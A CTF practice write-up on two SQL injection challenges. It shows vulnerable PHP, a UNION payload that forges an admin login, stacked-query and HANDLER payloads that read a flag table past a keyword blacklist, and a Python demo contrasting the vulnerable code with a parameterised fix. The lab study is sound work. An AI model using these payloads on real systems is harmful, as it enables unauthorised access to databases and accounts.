BUUCTF practice notes (14)
§ [GXYCTF2019]BabySQli
§ [GYCTF2020]Blacklist
[GXYCTF2019]BabySQli
<?php
// $con (the mysqli connection) and $flag are defined elsewhere in the challenge source.
mysqli_query($con, 'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
// $name is concatenated straight into the query: this is the injection point.
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);
if(preg_match("/\(|\)|\=|or/", $name)){
    die("do not hack me!");
}
else{
    if (!$result) {
        printf("Error: %s\n", mysqli_error($con));
        exit();
    }
    else{
        // echo '<pre>';
        // Only the first returned row is read; its 2nd and 3rd columns are trusted as-is.
        $arr = mysqli_fetch_row($result);
        // print_r($arr);
        if($arr[1] == "admin"){
            if(md5($password) == $arr[2]){
                echo $flag;
            }
            else{
                die("wrong pass!");
            }
        }
        else{
            die("wrong user!");
        }
    }
}
Hint: MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
Base32 decode: c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==
Base64 decode: select * from user where username = '$name'
Trying a few names shows the username is admin.
Fuzzing shows the filter blocks `(`, `)`, `=`, `or`, `xor`, `order` and similar keywords (anything containing `or` is caught by the regex).
The second column holds the username and the third column the MD5 of the password.
Since only the first row is read and its columns are trusted, a UNION branch can supply a forged row whose third column is a hash we know (21232f297a57a5a743894a0e4a801fc3 is md5("admin")):
name=' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3' #&pw=admin
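The root cause is string concatenation plus trusting whatever row comes back. The following added example (my own code, not the challenge's) rebuilds the login check on an in-memory SQLite table with a constructed admin row and shows the vulnerable shape beside the parameterised fix; the table layout, the admin password and the `-- ` comment (SQLite's replacement for MySQL's `#`) are assumptions.

```python
import hashlib
import hmac
import sqlite3

# Constructed stand-in for the challenge's `user` table, laid out as the writeup
# found it: second column is the username, third is the MD5 of the password.
ADMIN_PASSWORD = "secret-admin-pw"   # assumed value, not from the challenge


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO user VALUES (1, 'admin', ?)",
                (hashlib.md5(ADMIN_PASSWORD.encode()).hexdigest(),))
    return con


def login_vulnerable(con, name, pw):
    # Same shape as the challenge PHP: concatenate, then trust the first row.
    # A UNION branch inside `name` can supply its own username/hash pair, so the
    # md5 comparison below is made against attacker-chosen data.
    sql = "select * from user where username = '" + name + "'"
    row = con.execute(sql).fetchone()
    if row is None or row[1] != "admin":
        return False
    return hashlib.md5(pw.encode()).hexdigest() == row[2]


def login_fixed(con, name, pw):
    # Bind `name` as a parameter: it is data, never SQL, so no UNION can be appended
    # and the only hash ever compared is the one the database really holds.
    row = con.execute("select * from user where username = ?", (name,)).fetchone()
    if row is None:
        return False
    # Constant-time comparison; the MD5 scheme itself is kept as the challenge has it.
    return hmac.compare_digest(hashlib.md5(pw.encode()).hexdigest(), row[2])


# The writeup's payload, with MySQL's `#` comment swapped for SQLite's `-- `.
PAYLOAD_NAME = "' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3' -- "

if __name__ == "__main__":
    con = make_db()
    print("vulnerable, forged row:", login_vulnerable(con, PAYLOAD_NAME, "admin"))  # True
    print("fixed, forged row:     ", login_fixed(con, PAYLOAD_NAME, "admin"))       # False
    print("fixed, real password:  ", login_fixed(con, "admin", ADMIN_PASSWORD))     # True
```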
[GYCTF2020]Blacklist
Union injection
-1' or 1=1 order by 3 #
error 1054 : Unknown column '3' in 'order clause'
-1' union select 1,2 #
This gets blocked; the challenge's blacklist is:
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
Stacked injection
The filter does not block `;` or `show`, so stacked queries still work:
-1';show tables #
array(1) {
  [0]=>
  string(8) "FlagHere"
}
array(1) {
  [0]=>
  string(5) "words"
}
-1';desc FlagHere #
array(6) {
  [0]=>
  string(4) "flag"
  [1]=>
  string(12) "varchar(100)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}
HANDLER query
This is similar to [强网杯 2019]随便注, but here set, prepare, alter and rename are all filtered, so the prepared-statement trick is out; HANDLER statements are used to read the table instead:
-1';handler FlagHere open;handler FlagHere read first;handler FlagHere close; #
Summary
- `HANDLER tbl OPEN` / `HANDLER tbl READ FIRST` / `HANDLER tbl CLOSE` read rows from the named table directly without a SELECT, so a keyword blacklist that only covers SELECT-style statements does not stop them; parameterised queries and disabling multi-statement execution are the real fix.